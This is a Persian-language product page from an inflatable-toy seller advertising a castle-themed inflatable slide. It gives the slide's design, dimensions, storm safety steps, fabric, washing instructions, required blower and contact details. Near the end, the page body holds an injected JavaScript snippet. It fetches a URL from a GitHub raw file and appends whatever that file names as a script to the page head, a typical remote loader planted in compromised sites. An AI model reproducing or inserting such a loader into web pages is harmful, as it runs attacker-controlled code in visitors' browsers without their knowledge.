سرسره بادی طرح قلعه

 • قصربادی طرح قلعه یک لاین سر و یک لاین راه پله می باشد معمولا در شهر بازی ها وپارک ها که فضای کافی داشته باشند استفاده میکنند. این سرسره از طرح رنگ های شاد استفاده شده که باعث جذب کودکان بشود. در جلوی ورودی این دستگاه دو مناره بلند با سرسره بادی طرح قلعه و دو شوالیه که جلوی در ایستاده اندو همچنین این دو مناره با یک ارک به هم دیگر متصل شدند که مثل دروازه طراحی شده است. در بالای دستگاه روی دیوار های سکو 4 مناره کوتاه دارد که مثل دیوار های یک قلعه صراحی شده.

  ابعاد و اندازه وزن قصربادی قلعه ۳۵۰ کیلوگرم، طول ۱۰ این سرسره متر و عرض ۶.۵ آن  متر می باشد. همچنین ارتفاع این سرسره ۸.۵ متر است. بنابرین شما می توانیداین سرسره بزرگ معمولا در شهر بازی ها وپارک ها که فضای کافی داشته باشند استفاده میکنند. شرایط اضطراری به هیچ وجه هنگام باد طوفان سرسره رو باد نکید. اگر سرسره باد بود و باد طوفان یک دفعه شروع شد افراد را از روی دستگاه به پایین بیاورید دستگاه رو خاموش کنید و دریچه های تخلیه هوا را باز کنیید که هوای داخل دستگاه سریع تر تخلیه شود. جنس پارچه و دوخت سرسره بادی طرح قلعه پارچه این سرسره از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این سرسره با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است. نحوه شستشوی قصربادی برای شستشوی این دستگاه فقط و فقط آب آن را آب بشوید اگر سرسره با ریکا، وایتکس و … مواد شوینده دیگر بشویید دستگاه نخ و پارچه دستگاه پوسیده و از بین می رود. لوازم جانبی قصربادی این قصربادی نیازمند یک پمپ هوا (دمنده باد) یک نیم اسب می باشد. همچنین نیازمند اقلام پیشفرض مانند روکش سر و واکس است.

  نحوه خرید سرسره بادی طرح قلعه

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید قصر بادی طرح قلعه می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید